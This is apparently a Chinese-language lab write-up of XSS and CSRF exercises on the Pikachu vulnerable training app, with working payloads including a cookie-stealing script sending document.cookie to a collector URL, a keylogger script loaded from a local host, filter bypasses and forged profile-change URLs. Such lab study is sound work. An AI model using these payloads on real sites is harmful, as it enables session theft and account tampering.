xss csrf
反射形
发现有字数限制,先改为99

然后输入

提交后就会弹窗

查看源码,发现以及写入源码中。
反射形(post)


先构造一个网页模拟提交
然后构造语句<script>document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

之后就收集到cookies
存储型xss

先改rk.js文件,然后将其构造为payload
<script src="http://192.168.171.129/pikachu/pkxss/rkeypress/rk.js"></script>
![]()
然后再次登录,输入sdafffffff

输入信息后,可以发现信息以及被发送

查看后台发现输入被记录。
dom型xss

发现输入变为标签内容,查看源码

根据源码输入payload ' onclick=alert("xss")> 关闭herf 并同时设为点击弹窗。

dom型xss-s
查看源码,发现将+替换为空格,所以继续构造payload ‘ onlick=alert("aqh")>

能够正常弹窗
xss之盲打
查看发现不会有任何内容回显,猜测在后台记录尝试构造payload

后台查看图像,发现

攻击成功。
xss之过滤
发现会过滤掉script
重新构造payload <a href="" onlick=alert("aqh")>aqh</a>


XSS之htmlspecialchars
发现一些字符会发生转义,但单引号可以正常使用。
所以构造payload ' onclick=alert('aqh') '


发现能够成功攻击。
XSS之href输出

发现单引号也被过滤,所以尝试js转移。


发现攻击成功。
XSS之js输出
查看源码发现先对输入的内容放入js中进行判断,所以根据这个构造payload '</script><script>alert=('aqh')</script>

scrf(get)

抓包发现信息修改为get型,所以构造payload:http://192.168.50.183/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=12345678922&add=hacker&email=lucy%40pikachu.com&submit=submit

修改成功。
scrf(post)

修改信息,抓包发现为post型,构造表单

然后构造payload: http://192.168.50.183/pikachu/post.html

修改成功
scrf(token)

抓包发现含有token
所以构造payload:http://192.168.50.183/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=12345678922&add=hacker&email=lucy%40pikachu.com&token=116745df631f5281b9631342516&submit=submit

发现修改成功。

浙公网安备 33010602011771号